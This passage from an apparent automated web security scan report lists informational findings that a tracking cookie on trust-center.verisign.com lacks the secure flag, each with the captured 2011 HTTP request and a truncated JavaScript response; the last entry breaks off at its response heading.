GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:36 GMT Server: ApacheSet-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1674 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ /* Create new OnlineOpini...[SNIP]...
6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/oo_engine_c.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 28368 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var OnlineOpinion=new Ob...[SNIP]...
6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/popup.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/popup.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 598 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(...[SNIP]...
6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/product_white_list.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1005 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ...[SNIP]...
6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/quick_signin.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 5155 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle...[SNIP]...
6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/script_log.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/script_log.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1408 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}} function generateCall(level,message){var url='...[SNIP]...
6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/src/dojo/dojo/dojo.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:25 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 89269 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved. Available via Academic Free License >= 2.1 OR the modified BSD license. see: http://dojotoolkit.org/license for details */ /* ...[SNIP]...
6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/syscheck.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/syscheck.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: ApacheSet-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1470 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}} function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o...[SNIP]...
6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/tealeaf/TealeafSDK.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 57905 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi...[SNIP]...
6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: ApacheSet-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 22968 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* * Copyright . 1999-2009 TeaLeaf Technology, Inc. * All rights reserved. * * THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS'' ...[SNIP]...
6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/trustcenter_capture_payment.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4605 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi...[SNIP]...
6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/trustcenter_product_selector.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
